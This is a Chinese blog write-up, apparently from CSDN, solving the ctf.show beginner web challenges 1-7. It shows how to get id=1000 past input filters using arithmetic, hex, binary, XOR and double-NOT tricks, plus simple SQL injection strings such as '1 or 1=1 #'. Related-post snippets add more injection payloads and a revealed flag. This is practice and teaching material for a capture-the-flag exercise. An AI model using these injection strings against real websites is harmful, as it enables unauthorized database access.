ctf.show_萌新_web 1-7

最新推荐文章于 2023-04-29 21:41:31 发布
最新推荐文章于 2023-04-29 21:41:31 发布
阅读量457 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MiGooli/article/details/117756873
版权

目录

一、做题思路

Web1-7的思路都是一样的,就是通过sql语句绕过或者函数绕过来构造id=1000

二、各种绕过方法

1.运算符绕过

(1) id = 999 + 1
(2) id = 200 * 5
(3) id = 100 / 0.1

2.进制转换

(1) id = 0b1111101000
(2) id = 0x38e

3.字节操作

(1) id = ~~1000
(2) id = 200 ^ 800
(3) id = 992 | 8

4.sql注入

(1) id = 1 or 1=1 #
(2) id = id #

5.绕过函数

因为题目中含有intval()函数,所以可以绕过intval()来构造id
(1) id = ‘1000’

三、题目详情

1.web1

题目截图:
在这里插入图片描述
题目没有任何过滤,直接构造payload即可得到flag

?id=999%2b1

2.web2

题目截图:
在这里插入图片描述
这边过滤了加号’ + ',使用十六进制绕过构造payload即可

?id=0x38e

3.web3

题目截图:
在这里插入图片描述
这里多过滤了十六进制,使用乘号’ * '绕过构造payload

?id=100*10

4.web4

题目截图:
在这里插入图片描述
这里把加减乘除都给过滤了,还过滤了十六进制和select语句,绕过intval函数构造payload

?id=‘1000’

5.web5

题目截图:
在这里插入图片描述
这里多过滤了单引号和双引号,使用异或构造payload

?id=200^800

6.web6

题目截图:
在这里插入图片描述这里多过滤了一个异或号’ ^ ',使用双重取反构造payload

?id=~~1000

7.web7

题目截图:
在这里插入图片描述

这里把取反号’ ~ '也过滤掉了,使用二进制构造payload

?id=0b1111101000

MiGooli
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf.show_web2解题过程
qq_38634097的博客
05-24 521
打开场景看到的是登录框,输入弱口令admin/admin、admin/123456等无结果。我们已知,mysql5.0以上版本有infomation_schema,所以此处可以利用内置的数据库查询。得到flag:ctfshow{4db0befe-fc42-4b6f-8faf-f4b81f94fb82}构造poc:1’ or 1=1 # 进行登录,得到以下结果。1’ or 1=1 order by 4 # 登录失败。1’ or 1=1 order by 3 # 登录成功。得到第一列为flqg,
ctf.show_web5
Nothing-one的博客
11-20 2593
这道题就是代码的审计也就是我们要看出每一行代码都是什么作用。 <?php $flag=""; $v1=$_GET['v1']; $v2=$_GET['v2']; if(isset($v1) && isset($v2)){ if(!ctype_alpha($v1)){ die("v1 error"); } if(!is_n
ctfshow-WEB-web7
热门推荐
wangyuxiang946的博客
08-22 1万+
ctf.show WEB模块第7关是一个SQL注入漏洞,注入点是数值型注入,源码中过滤了空格,我们可以使用括号()或者注释/**/来代替空格 页面中有一个文章列表,随便点一个 从url地址栏中可以看到,页面通过文章的id值来查询文章内容,我们可以考虑SQL注入漏洞 首先判断注入点,输入以下payload,使SQL恒成立 1/**/and/**/1 可以看到,页面正常显示 在输入以下payload,使SQL恒不成立 1/**/and/**/0 可以...
ctfshow之_萌新web1至web7
XiaoXiao_RenHe的专栏
04-29 1537
ctfshow之_萌新web1至web7问题解答;intval、~~sql语句的2次取反、|或运算、^异或运算、
ctfshow 萌新计划web 1-7
m0_46412682的博客
07-14 823
ctfshow 萌新计划 1-7 1-4 /?id=‘1000’ 5 /?id=144^888 其实就是144异或888 6 /?id=~1000 ~表示取反 7 /?id=0b1111101000 0b表示二进制,0b1111101000=1000 参考: https://blog.csdn.net/qq_41617034/article/details/105249339?depth_1-utm_source=distribute.pc_relevant.none-task
CTF show----web 解题笔记(web7~web10)
weixin_45908624的博客
01-05 616
ctfshow web7-web10
ctf.show-萌新计划(1-7)
1stPeak's Blog
04-02 3347
这是ctf.show的萌新计划,简单记录一下,太菜了,还没全做出来… 第一题 源码: <html> <head> <title>ctf.show萌新计划web1</title> <meta charset="utf-8"> </head> <body> <?php # 包含数据库连接文件 ...
ctf.show_web9
10-21
ctf.show_web9是一个CTF比赛中的一个web安全题目,考察的是命令执行漏洞的利用方式。这一关需要使用PHP的命令执行函数执行系统命令,读取网站根目录下的配置文件,获取flag。具体来说,需要通过构造payload,将命令...
ctf.show_web6
最新发布
10-21
ctf.show_web6是一个WEB模块,其中存在一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格。我们可以使用括号()或者注释/**/绕过。如果成功注入,可以获取到flag。同时,在密码框中输入空格也会多一个黑点...
ctfshow web入门——web7
m0_74093152的博客
01-29 363
ctfshowweb入门——web7
Ctfshow web-web7 WP
qq_45427131的博客
05-12 453
首先讲一下数据库的判断 基础知识: select ascii(substr(database(),1,1))=119 ; 上面这段话的意思,可以分布理解 1、 首先是ascii()函数 , 熟悉mysql的应该知道,这是查询字符ascii码的 2、A的ascii码是65 a的ascii码是97 3、Substr()的函数作用是截取,有点类似于limit的作用 Substr(需要截取的字符串,开始位置,截取长度) 4、举个例子,当前我选中mysql数据库,尝试用select substr
CTFSHOW【萌新计划】Writeup
abtgu的博客
05-16 3000
CTFSHOW【萌新计划】web1【萌新计划】web2【萌新计划】web3【萌新计划】web4【萌新计划】web5【萌新计划】web6【萌新计划】web7【萌新计划】web8【萌新计划】web9【萌新计划】web10【萌新计划】web11 【萌新计划】web1 题目: 代码很安全,没有漏洞。 解题思路: 题目代码 <html> <head> <title>ctf.show萌新计划web1</title> <meta charset="u
CTF论剑场web题目(持续更新)--WEB7
jiuyongpinyin的博客
07-25 346
web7 打开页面,发现是一个登陆界面,尝试登陆: 提示权限不够,抓包: 是一个302的重定向页面,页面会携带u和r这两个cookie登陆: 我们会发现最后的权限验证是验证了之前的cookie,这时候会想到会不会是cookie伪造,我们先来解决这两个携带过来的cookie,看见这两个cookie首先感觉是md5加密,但是全部复制之后解密发现时错误的,在经过自己观察,发现两个cookie的前10位是一样的,这时候我想会不会应该是解密十位之后,解密十位之后发现: u的十位后解密得到的是admin,r的十
CTF—WEB基础篇
qq_53058639的博客
03-17 4024
简介JavaScript 是互联网上最流行的脚本语言,这门语言可用于 HTML 和 web,更可广泛用于服务器、PC、笔记本电脑、平板电脑和智能手机等设备。作用JavaScript 是脚本语言JavaScript 是一种轻量级的编程语言。JavaScript 是可插入 HTML 页面的编程代码。JavaScript 插入 HTML 页面后,可由所有的现代浏览器执行。JavaScript 很容易学习。
CTF——web个人总结
recover517的博客
05-28 1万+
包含个人总结的解题思路、注入思路、文件包含思路、源码审计思路等
ctfshow-萌新
qq_43618536的博客
07-14 4468
ctfshow-萌新
ctfshow萌新web1~21
qq_46041723的博客
12-10 5807
萌新前言萌新web1web2web3web4web5web6web7web8web9web10web11web12web 13用到的知识web14web15web16web17web18web19web20web21 前言 经常做ctfshow上面的题目,发现这个是真心的不错,就是除了做不出来也没什么了,害! 萌新 web1 没啥好说的,看到源码提示id不能大于999,还要等于1000,直接取反,payload?id=~~1000,没过滤,直接得到flag web2 细节同上 web3 同上 web4 同上
Ctfshow web 入门1~20题(萌新向)
weixin_52805837的博客
12-29 3937
Ctfshow web 入门1~12题 web1: 打开网址显示如下: F12直接查看源码即可得到flag web2: ctrl+u打开源码即可得到flag web3: 根据提示“没思路抓个包看看,可能有意外收获” 抓包之后,如上得到了flag web4: ...
CTFSHOW 萌新计划 web 1-8
羽的博客
04-02 3623
题目地址:http://ctf.show web1-7 目的很明确,有几种形式 构造出id=1000,或者sql语句绕过或者绕过函数。 0x01:进制转换 1.二进制 0b1111101000 2.十六进制 0x38e 0x02:字节操作 1.取反 2.异或 200^800 3,按位与 992|8 4.按位或 0x03:运算符 1.乘法 200*5 2.除法 10/0.01 3.减法 200–80...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值